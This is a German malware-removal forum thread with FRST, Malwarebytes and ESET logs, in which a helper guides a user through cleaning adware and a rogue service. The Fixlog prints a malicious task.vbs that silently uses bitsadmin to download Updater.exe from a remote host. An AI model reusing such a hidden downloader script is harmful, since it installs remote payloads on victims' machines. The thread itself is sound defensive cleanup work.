2010-06-02 06:22 - 2010-06-02 06:22 - 1040745 _____ () C:\Program Files (x86)\Mar2009_d3dx10_41_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1973702 _____ () C:\Program Files (x86)\Mar2009_d3dx9_41_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1612446 _____ () C:\Program Files (x86)\Mar2009_d3dx9_41_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0054600 _____ () C:\Program Files (x86)\Mar2009_X3DAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0021298 _____ () C:\Program Files (x86)\Mar2009_X3DAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0121506 _____ () C:\Program Files (x86)\Mar2009_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0092740 _____ () C:\Program Files (x86)\Mar2009_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0275044 _____ () C:\Program Files (x86)\Mar2009_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0273018 _____ () C:\Program Files (x86)\Mar2009_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0864600 _____ () C:\Program Files (x86)\Nov2007_d3dx10_36_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0803884 _____ () C:\Program Files (x86)\Nov2007_d3dx10_36_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1802058 _____ () C:\Program Files (x86)\Nov2007_d3dx9_36_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1709360 _____ () C:\Program Files (x86)\Nov2007_d3dx9_36_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0046144 _____ () C:\Program Files (x86)\NOV2007_X3DAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0018496 _____ () C:\Program Files (x86)\NOV2007_X3DAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0196762 _____ () C:\Program Files (x86)\NOV2007_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0148264 _____ () C:\Program Files (x86)\NOV2007_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0994154 _____ () C:\Program Files (x86)\Nov2008_d3dx10_40_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0965421 _____ () C:\Program Files (x86)\Nov2008_d3dx10_40_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1906878 _____ () C:\Program Files (x86)\Nov2008_d3dx9_40_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1550796 _____ () C:\Program Files (x86)\Nov2008_d3dx9_40_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0054522 _____ () C:\Program Files (x86)\Nov2008_X3DAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0021851 _____ () C:\Program Files (x86)\Nov2008_X3DAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0121794 _____ () C:\Program Files (x86)\Nov2008_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0092684 _____ () C:\Program Files (x86)\Nov2008_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0273960 _____ () C:\Program Files (x86)\Nov2008_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0272611 _____ () C:\Program Files (x86)\Nov2008_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0086037 _____ () C:\Program Files (x86)\Oct2005_xinput_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0045359 _____ () C:\Program Files (x86)\Oct2005_xinput_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1412902 _____ () C:\Program Files (x86)\OCT2006_d3dx9_31_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1127217 _____ () C:\Program Files (x86)\OCT2006_d3dx9_31_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0182361 _____ () C:\Program Files (x86)\OCT2006_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0138017 _____ () C:\Program Files (x86)\OCT2006_XACT_x86.cab
2015-07-05 04:14 - 2015-07-05 04:14 - 0000911 _____ () C:\Users\Kenny G\AppData\Local\recently-used.xbel
2014-07-31 10:50 - 2014-07-31 10:51 - 0022400 _____ () C:\ProgramData\RUNDLL32.EXE-1180-F.txt
2014-07-06 17:23 - 2014-07-06 17:23 - 0244720 _____ () C:\ProgramData\RUNDLL32.EXE-12956-F.txt
2014-07-27 17:22 - 2014-07-28 13:07 - 0079618 _____ () C:\ProgramData\RUNDLL32.EXE-1384-F.txt
2014-07-10 10:53 - 2014-07-10 17:12 - 0298281 _____ () C:\ProgramData\RUNDLL32.EXE-1424-F.txt
2014-07-19 22:13 - 2014-07-20 00:37 - 0113345 _____ () C:\ProgramData\RUNDLL32.EXE-1436-F.txt
2014-07-30 09:52 - 2014-07-30 13:45 - 0181914 _____ () C:\ProgramData\RUNDLL32.EXE-1596-F.txt
2014-07-21 20:18 - 2014-07-21 22:11 - 0087977 _____ () C:\ProgramData\RUNDLL32.EXE-1788-F.txt
2014-07-18 05:35 - 2014-07-18 11:01 - 0242621 _____ () C:\ProgramData\RUNDLL32.EXE-2188-F.txt
2014-07-31 18:04 - 2014-07-31 18:05 - 0001416 _____ () C:\ProgramData\RUNDLL32.EXE-2284-F.txt
2014-07-31 10:34 - 2014-07-31 10:45 - 0008414 _____ () C:\ProgramData\RUNDLL32.EXE-2308-F.txt
2014-07-18 22:37 - 2014-07-19 01:07 - 0118602 _____ () C:\ProgramData\RUNDLL32.EXE-2348-F.txt
2014-07-28 15:20 - 2014-07-28 15:52 - 0025184 _____ () C:\ProgramData\RUNDLL32.EXE-2444-F.txt
2014-07-29 22:22 - 2014-07-29 23:10 - 0038461 _____ () C:\ProgramData\RUNDLL32.EXE-2460-F.txt
2014-07-12 11:11 - 2014-07-12 12:12 - 0048083 _____ () C:\ProgramData\RUNDLL32.EXE-2480-F.txt
2014-07-10 19:57 - 2014-07-10 20:25 - 0007207 _____ () C:\ProgramData\RUNDLL32.EXE-2584-F.txt
2014-07-29 10:41 - 2014-07-29 12:12 - 0071934 _____ () C:\ProgramData\RUNDLL32.EXE-2904-F.txt
2014-07-16 20:21 - 2014-07-17 22:12 - 0478880 _____ () C:\ProgramData\RUNDLL32.EXE-3004-F.txt
2014-07-20 08:08 - 2014-07-20 11:56 - 0181099 _____ () C:\ProgramData\RUNDLL32.EXE-3044-F.txt
2014-08-01 06:26 - 2014-08-01 13:03 - 0282818 _____ () C:\ProgramData\RUNDLL32.EXE-3108-F.txt
2014-07-10 22:41 - 2014-07-10 23:23 - 0033087 _____ () C:\ProgramData\RUNDLL32.EXE-3160-F.txt
2014-07-12 04:26 - 2014-07-12 05:10 - 0035209 _____ () C:\ProgramData\RUNDLL32.EXE-3164-F.txt
2014-07-28 18:24 - 2014-07-28 19:58 - 0074219 _____ () C:\ProgramData\RUNDLL32.EXE-3264-F.txt
2014-08-07 06:42 - 2014-08-07 09:07 - 0076563 _____ () C:\ProgramData\RUNDLL32.EXE-3272-F.txt
2014-08-12 17:39 - 2014-08-12 17:48 - 0005807 _____ () C:\ProgramData\RUNDLL32.EXE-3288-F.txt
2014-08-12 18:47 - 2014-08-12 21:55 - 0104772 _____ () C:\ProgramData\RUNDLL32.EXE-3308-F.txt
2014-08-15 13:01 - 2014-08-15 13:53 - 0017691 _____ () C:\ProgramData\RUNDLL32.EXE-3356-F.txt
2014-08-14 16:21 - 2014-08-14 18:56 - 0059067 _____ () C:\ProgramData\RUNDLL32.EXE-3396-F.txt
2014-08-16 03:06 - 2014-08-16 04:02 - 0018161 _____ () C:\ProgramData\RUNDLL32.EXE-3452-F.txt
2014-08-03 08:19 - 2014-08-03 14:26 - 0294846 _____ () C:\ProgramData\RUNDLL32.EXE-3468-F.txt
2014-08-01 13:28 - 2014-08-03 00:37 - 0583063 _____ () C:\ProgramData\RUNDLL32.EXE-3480-F.txt
2014-08-07 10:20 - 2014-08-08 02:21 - 0085411 _____ () C:\ProgramData\RUNDLL32.EXE-3500-F.txt
2014-08-16 02:53 - 2014-08-16 03:05 - 0004128 _____ () C:\ProgramData\RUNDLL32.EXE-3516-F.txt
2014-08-07 01:45 - 2014-08-07 05:13 - 0115168 _____ () C:\ProgramData\RUNDLL32.EXE-3524-F.txt
2014-08-14 11:31 - 2014-08-14 13:24 - 0035565 _____ () C:\ProgramData\RUNDLL32.EXE-3528-F.txt
2014-07-15 19:58 - 2014-07-15 21:04 - 0045897 _____ () C:\ProgramData\RUNDLL32.EXE-3548-F.txt
2014-08-15 20:50 - 2014-08-15 23:14 - 0052980 _____ () C:\ProgramData\RUNDLL32.EXE-3552-F.txt
2014-08-06 21:49 - 2014-08-06 23:29 - 0071408 _____ () C:\ProgramData\RUNDLL32.EXE-3560-F.txt
2014-08-04 05:01 - 2014-08-05 06:05 - 0508848 _____ () C:\ProgramData\RUNDLL32.EXE-3564-F.txt
2014-07-09 21:47 - 2014-07-09 23:03 - 0060832 _____ () C:\ProgramData\RUNDLL32.EXE-3576-F.txt
2014-08-12 15:19 - 2014-08-12 15:29 - 0005538 _____ () C:\ProgramData\RUNDLL32.EXE-3632-F.txt
2014-08-06 21:27 - 2014-08-06 21:30 - 0002580 _____ () C:\ProgramData\RUNDLL32.EXE-3656-F.txt
2014-08-08 03:06 - 2014-08-11 13:07 - 0049817 _____ () C:\ProgramData\RUNDLL32.EXE-3688-F.txt
2014-08-03 16:46 - 2014-08-03 20:12 - 0162566 _____ () C:\ProgramData\RUNDLL32.EXE-3716-F.txt
2014-07-26 00:51 - 2014-07-26 09:44 - 0140982 _____ () C:\ProgramData\RUNDLL32.EXE-3828-F.txt
2014-07-26 23:06 - 2014-07-31 18:22 - 0025692 _____ () C:\ProgramData\RUNDLL32.EXE-3836-F.txt
2014-07-27 01:58 - 2014-07-27 03:43 - 0082833 _____ () C:\ProgramData\RUNDLL32.EXE-3848-F.txt
2014-08-15 17:05 - 2014-08-15 18:28 - 0024905 _____ () C:\ProgramData\RUNDLL32.EXE-3900-F.txt
2014-08-05 09:40 - 2014-08-05 20:23 - 0262790 _____ () C:\ProgramData\RUNDLL32.EXE-4020-F.txt
2014-07-25 21:52 - 2014-07-28 22:06 - 0076241 _____ () C:\ProgramData\RUNDLL32.EXE-4028-F.txt
2014-07-30 03:30 - 2014-07-30 05:19 - 0086514 _____ () C:\ProgramData\RUNDLL32.EXE-4048-F.txt
2014-07-30 09:31 - 2014-07-30 09:50 - 0012645 _____ () C:\ProgramData\RUNDLL32.EXE-4088-F.txt
2014-07-21 04:57 - 2014-07-21 14:44 - 0070566 _____ () C:\ProgramData\RUNDLL32.EXE-4092-F.txt
2014-07-11 11:19 - 2014-07-11 22:30 - 0228731 _____ () C:\ProgramData\RUNDLL32.EXE-4136-F.txt
2014-07-09 10:18 - 2014-07-09 11:48 - 0071159 _____ () C:\ProgramData\RUNDLL32.EXE-4148-F.txt
2014-07-29 14:02 - 2014-07-29 20:15 - 0170297 _____ () C:\ProgramData\RUNDLL32.EXE-4196-F.txt
2014-07-26 14:42 - 2014-07-26 15:48 - 0052128 _____ () C:\ProgramData\RUNDLL32.EXE-4212-F.txt
2014-07-14 17:22 - 2014-07-14 23:13 - 0274928 _____ () C:\ProgramData\RUNDLL32.EXE-4220-F.txt
2014-07-24 16:43 - 2014-07-25 04:36 - 0333823 _____ () C:\ProgramData\RUNDLL32.EXE-4292-F.txt
2014-07-08 18:10 - 2014-07-08 19:36 - 0067558 _____ () C:\ProgramData\RUNDLL32.EXE-4304-F.txt
2014-07-15 21:56 - 2014-07-15 23:43 - 0084278 _____ () C:\ProgramData\RUNDLL32.EXE-4328-F.txt
2014-07-07 12:11 - 2014-07-07 12:11 - 0967929 _____ () C:\ProgramData\RUNDLL32.EXE-4416-F.txt
2014-07-25 04:43 - 2014-07-25 20:32 - 0390092 _____ () C:\ProgramData\RUNDLL32.EXE-4440-F.txt
2014-07-12 05:11 - 2014-07-12 05:13 - 0002034 _____ () C:\ProgramData\RUNDLL32.EXE-4444-F.txt
2014-07-22 05:15 - 2014-07-22 06:02 - 0037273 _____ () C:\ProgramData\RUNDLL32.EXE-4448-F.txt
2014-07-21 17:40 - 2014-07-21 18:08 - 0022362 _____ () C:\ProgramData\RUNDLL32.EXE-4452-F.txt
2014-07-31 17:44 - 2014-07-31 17:44 - 0000282 _____ () C:\ProgramData\RUNDLL32.EXE-4540-F.txt
2014-07-13 12:53 - 2014-07-13 14:32 - 0078792 _____ () C:\ProgramData\RUNDLL32.EXE-4584-F.txt
2014-07-07 12:12 - 2014-07-07 14:05 - 0090638 _____ () C:\ProgramData\RUNDLL32.EXE-4604-F.txt
2014-07-31 17:35 - 2014-07-31 17:38 - 0002205 _____ () C:\ProgramData\RUNDLL32.EXE-4648-F.txt
2014-07-13 18:37 - 2014-07-14 17:20 - 0170811 _____ () C:\ProgramData\RUNDLL32.EXE-4736-F.txt
2014-07-13 08:58 - 2014-07-13 12:49 - 0182356 _____ () C:\ProgramData\RUNDLL32.EXE-4744-F.txt
2014-07-16 15:41 - 2014-07-16 20:04 - 0202579 _____ () C:\ProgramData\RUNDLL32.EXE-4780-F.txt
2014-07-31 17:53 - 2014-07-31 18:02 - 0007265 _____ () C:\ProgramData\RUNDLL32.EXE-4804-F.txt
2014-07-07 20:59 - 2014-07-07 22:47 - 0084404 _____ () C:\ProgramData\RUNDLL32.EXE-4808-F.txt
2014-07-08 20:17 - 2014-07-24 15:47 - 0414838 _____ () C:\ProgramData\RUNDLL32.EXE-4840-F.txt
2014-07-22 11:02 - 2014-07-23 06:10 - 0175986 _____ () C:\ProgramData\RUNDLL32.EXE-4920-F.txt
2014-07-19 08:24 - 2014-07-20 23:01 - 0130594 _____ () C:\ProgramData\RUNDLL32.EXE-5048-F.txt
2014-07-08 20:04 - 2014-07-08 20:13 - 0007500 _____ () C:\ProgramData\RUNDLL32.EXE-5068-F.txt
2014-07-12 13:09 - 2014-07-13 00:47 - 0294315 _____ () C:\ProgramData\RUNDLL32.EXE-5072-F.txt
2014-07-26 12:36 - 2014-07-26 14:05 - 0069795 _____ () C:\ProgramData\RUNDLL32.EXE-704-F.txt
2014-08-13 09:50 - 2014-08-13 19:20 - 0161035 _____ () C:\ProgramData\RUNDLL32.EXE-780-F.txt
2014-07-30 21:15 - 2014-07-30 23:07 - 0088664 _____ () C:\ProgramData\RUNDLL32.EXE-784-F.txt
2014-07-15 10:41 - 2014-07-15 18:31 - 0370403 _____ () C:\ProgramData\RUNDLL32.EXE-808-F.txt
2014-07-06 17:24 - 2014-07-07 04:48 - 0338635 _____ () C:\ProgramData\RUNDLL32.EXE-9648-F.txt

Einige Dateien in TEMP:
====================
C:\Users\Kenny G\AppData\Local\Temp\Uninstall.exe


==================== Bamital & volsnap =================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
C:\Windows\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\Windows\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2015-09-21 19:16

==================== Ende von FRST.txt ============================
         
Mabam
Code:
ATTFilter
 Malwarebytes Anti-Malware 
www.malwarebytes.org

Suchlaufdatum: 23.09.2015
Suchlaufzeit: 04:58
Protokolldatei: mabam neu.txt
Administrator: Ja

Version: 2.1.8.1057
Malware-Datenbank: v2015.09.26.02
Rootkit-Datenbank: v2015.09.22.01
Lizenz: Kostenlose Version
Malware-Schutz: Deaktiviert
Schutz vor bösartigen Websites: Deaktiviert
Selbstschutz: Deaktiviert

Betriebssystem: Windows 7
CPU: x64
Dateisystem: NTFS
Benutzer: Kenny G

Suchlauftyp: Bedrohungssuchlauf
Ergebnis: Abgeschlossen
Durchsuchte Objekte: 515167
Abgelaufene Zeit: 24 Min., 22 Sek.

Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Aktiviert
Heuristik: Aktiviert
PUP: Aktiviert
PUM: Aktiviert

Prozesse: 0
(keine bösartigen Elemente erkannt)

Module: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 2
PUP.Optional.VOPackage, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\VOPackage, , [89f162d2701b0d29654c8a3f26deec14], 
PUP.Optional.MyTubeTheater, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\{C42C5197-0EE9-4940-893B-F4EF047DFF0F}, , [2159da5ac9c25ed8d04b05d3d1334cb4], 

Registrierungswerte: 0
(keine bösartigen Elemente erkannt)

Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)

Ordner: 0
(keine bösartigen Elemente erkannt)

Dateien: 1
PUP.Optional.Downloader, C:\Users\Kenny G\Desktop\Alles\bewerbung\Desktop Notes - CHIP-Installer.exe, , [6515f3417f0caf87749e063a28d8cd33], 

Physische Sektoren: 0
(keine bösartigen Elemente erkannt)


(end)
         

Alt 27.09.2015, 04:38   #9
burningice
/// Malwareteam
 
Malware-gen, Adware-gen ...usw - Standard

Malware-gen, Adware-gen ...usw



Danke für deine Nachricht, also weiter gehts

Schritt 1
Drücke bitte die Windowstaste + R Taste und schreibe notepad in das Ausführen Fenster.

Kopiere nun folgenden Text aus der Code-Box in das leere Textdokument


Code:
ATTFilter
CloseProcesses:
R2 zuroluxy; C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs [X]
C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\
HKLM Group Policy restriction on software: C:\Program Files\BitDefender 
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung 
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung 
HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung 
2015-09-20 19:00 - 2015-09-20 19:00 - 03237248 _____ (Enigma Software Group USA, LLC.) C:\Users\Kenny G\Downloads\SpyHunter-Installer.exe
2015-09-19 17:25 - 2015-09-21 18:10 - 00000000 ____D C:\Program Files (x86)\Trojan Remover
cmd: type C:\task.vbs
2015-09-19 12:15 - 2015-09-19 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913---
2015-09-19 12:14 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hp.bak
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
         

Speichere diese bitte als Fixlist.txt auf deinem Desktop (oder dem Verzeichnis in dem sich FRST befindet).
  • Starte nun FRST erneut und klicke den Entfernen Button.
  • Das Tool erstellt eine Fixlog.txt.
  • Poste mir deren Inhalt.



Schritt 2
Bitte starte wieder FRST und drücke auf Scan

Bitte poste in deiner nächsten Antwort also:
  • Fixlog.txt
  • Frst.txt
__________________
Mfg,
Rafael

~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~

Unterstütze uns mit einer Spende
......... Lob, Kritik oder Wünsche .........
.......... Folge uns auf Facebook ..........

Alt 27.09.2015, 20:12   #10
Zympop
 
Malware-gen, Adware-gen ...usw - Standard

Malware-gen, Adware-gen ...usw



Danke für die wiederaufnahme

Fixlog
Code:
ATTFilter
Entferungsergebnis von Farbar Recovery Scan Tool (x64) Version:23-09-2015
durchgeführt von Kenny G (2015-09-27 20:46:05) Run:1
Gestartet von C:\Users\Kenny G\Downloads
Geladene Profile: Kenny G & UpdatusUser (Verfügbare Profile: Kenny G & UpdatusUser & eLoot & Tabea Studium)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
CloseProcesses:
R2 zuroluxy; C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs [X]
C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\
HKLM Group Policy restriction on software: C:\Program Files\BitDefender 
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung 
HKU\S-1-5-21-682121585-3582832733-1082443493-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung 
HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung 
2015-09-20 19:00 - 2015-09-20 19:00 - 03237248 _____ (Enigma Software Group USA, LLC.) C:\Users\Kenny G\Downloads\SpyHunter-Installer.exe
2015-09-19 17:25 - 2015-09-21 18:10 - 00000000 ____D C:\Program Files (x86)\Trojan Remover
cmd: type C:\task.vbs
2015-09-19 12:15 - 2015-09-19 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913---
2015-09-19 12:14 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hp.bak
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
         
*****************

Prozess erfolgreich geschlossen.
zuroluxy => Dienst erfolgreich entfernt
C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579--- => erfolgreich verschoben
HKLM Group Policy restriction on software: C:\Program Files\BitDefender => erfolgreich wiederhergestellt
"HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => Schlüssel erfolgreich entfernt
"HKU\S-1-5-21-682121585-3582832733-1082443493-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => Schlüssel erfolgreich entfernt
HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Policies\Microsoft\Internet Explorer => Schlüssel nicht gefunden. 
C:\Users\Kenny G\Downloads\SpyHunter-Installer.exe => erfolgreich verschoben
C:\Program Files (x86)\Trojan Remover => erfolgreich verschoben

=========  type C:\task.vbs =========

Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high hxxp://www.nice-doggy.xyz/run/Updater.exe %TEMP%/Updater.exe",0, False)
WScript.Sleep 300000
cmds=WshShell.RUN("bitsadmin /cancel amijob",0, False)
Set WshShell = Nothing
Set WshShell = CreateObject("WScript.Shell")
cmds=WshShell.RUN("bitsadmin /transfer amijob /download /priority high hxxp://www.nice-doggy.xyz/run/Updater.exe %TEMP%/Updater.exe",0, False)
WScript.Sleep 300000
cmds=WshShell.RUN("bitsadmin /cancel amijob",0, False)
Set WshShell = Nothing

========= Ende von CMD: =========

C:\Users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913--- => erfolgreich verschoben
C:\Windows\system32\Drivers\etc\hp.bak => erfolgreich verschoben
C:\ProgramData\TEMP => ":373E1720" ADS erfolgreich entfernt.


Das System musste neu gestartet werden.. 

==== Ende von Fixlog 20:46:07 ====
         
FRST log hat leider zu viele Zeichen.

Habe die Datei hochgeladen.Hoffe das ist in Ordnung

FRST.txt

hxxp://www.file-upload.net/download-10938270/FRST.txt.html

Alt 28.09.2015, 13:42   #11
burningice
/// Malwareteam
 
Malware-gen, Adware-gen ...usw - Standard

Malware-gen, Adware-gen ...usw



Bitte poste dein Ergebnis nächstes Mal doch zwischen Code-Tags
Wenn ein Log zu lange ist, teile ihn bitte auf mehrere Antworten auf.

Code-Tags?

Drücke einfach die # in Antwortfenster und füge den Log dazwischen ein





Schritt 1

ESET Online Scanner

  • Hier findest du eine bebilderte Anleitung zu ESET Online Scanner
  • Lade und starte Eset Online Scanner
  • Setze einen Haken bei Ja, ich bin mit den Nutzungsbedingungen einverstanden und klicke auf Starten.
  • Aktiviere die "Erkennung von eventuell unerwünschten Anwendungen" und wähle folgende Einstellungen.
  • Klicke auf Starten.
  • Die Signaturen werden heruntergeladen, der Scan beginnt automatisch.
  • Klicke am Ende des Suchlaufs auf Fertig stellen.
  • Schließe das Fenster von ESET.
  • Explorer öffnen.
  • C:\Programme\Eset\EsetOnlineScanner\log.txt (bei 64 Bit auch C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) suchen und mit Deinem Editor öffnen (bebildert).
  • Logfile hier posten.
  • Deinstallation: Systemsteuerung => Software / Programme deinstallieren => Eset Online Scanner V3 entfernen.
  • Manuell folgenden Ordner löschen und Papierkorb leeren => C:\Programme\Eset

Frage

Fallen dir noch irgendwelche Probleme mit deinem Computer auf?

Bitte poste in deiner nächsten Antwort also:
  • Log von Eset
  • Antwort auf die Frage
__________________
Mfg,
Rafael

~ I'm storm. I'm calm. I'm fire. I'm ice. I'm burningice. ~

Unterstütze uns mit einer Spende
......... Lob, Kritik oder Wünsche .........
.......... Folge uns auf Facebook ..........

Alt 28.09.2015, 21:53   #12
Zympop
 
Malware-gen, Adware-gen ...usw - Standard

Malware-gen, Adware-gen ...usw



So Online Scan wird durchgeführt.

Leider fällt mir auf das mein Computer sehr langsam geworden ist.Habe ihn auch schon defrag.. und soweit aufgeräumt.Habe fast alle Programme gelöscht die beim Starten geöffnet werden. Ich glaube es sind noch einige Prozesse offen die mir Leistung klauen.Habe ohne etwas geöffnet zu haben nach dem Start 39% auslastung Psysikalischer Speicher.Cpu auslastung ist bei normalem gebrauch auch bei meistens 80-90%

So in einigen Minuten gibts den Eset.log

Vielen dank für deine bemühungen

Code:
ATTFilter
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=d3d2521426185d4e97455a3ab13cddc3
# end=init
# utc_time=2015-09-28 04:14:01
# local_time=2015-09-28 06:14:01 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.1.7601 NT Service Pack 1
Update Init
Update Download
Update Finalize
Updated modules version: 25979
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# EOSSerial=d3d2521426185d4e97455a3ab13cddc3
# end=updated
# utc_time=2015-09-28 04:34:26
# local_time=2015-09-28 06:34:26 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# osver=6.1.7601 NT Service Pack 1
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7777
# api_version=3.1.1
# EOSSerial=d3d2521426185d4e97455a3ab13cddc3
# engine=25979
# end=stopped
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=false
# antistealth_checked=true
# utc_time=2015-09-28 05:33:39
# local_time=2015-09-28 07:33:39 (+0100, Mitteleuropäische Sommerzeit)
# country="Germany"
# lang=1031
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode_1='AVG Internet Security 2015'
# compatibility_mode=1053 16777213 100 100 485436 130595603 0 0
# compatibility_mode_1=''
# compatibility_mode=5893 16776574 100 94 476626 195091469 0 0
# scanned=118538
# found=10
# cleaned=0
# scan_time=3553
sh=2BD678306E8D4F03D1CC0653593BCA7428AC2994 ft=1 fh=377f99cd72e631f0 vn="Win32/Adware.ConvertAd.YY Anwendung" ac=I fn="C:\FRST\Quarantine\C\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\Uninstall.exe"
sh=C2BF9E02AAF8CD61356523AF0425BD4DEEE8A0E8 ft=1 fh=aed2a53e39c1b826 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPTool64.exe"
sh=6C0CFF21847BEBDC22C8ED1C8A24ED19724D7741 ft=1 fh=91d5fb4f6ab1ad55 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC32Loader.dll"
sh=19D4CD0E4DDB51C3B3A25676F68963807BE1710C ft=1 fh=5c3c9fe0db73a8b4 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Program Files (x86)\SearchProtect\SearchProtect\bin\SPVC64.dll"
sh=1FBCCE3ECEBD5955F90E91C6B6B74EE06783CD66 ft=1 fh=cdd42cd0b2145c18 vn="Variante von Win32/ClientConnect.A evtl. unerwünschte Anwendung" ac=I fn="C:\System Volume Information\SystemRestore\FRStaging\Users\Kenny G\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U0VHME7J\spstub[1].exe"
sh=007D1E44C119A31982147BA37DD4FBDABEB6C999 ft=1 fh=313da661c7196dc6 vn="Variante von Win32/DownloadSponsor.C evtl. unerwünschte Anwendung" ac=I fn="C:\Users\Kenny G\Desktop\Alles\bewerbung\Cloud Downloader - CHIP-Installer.exe"
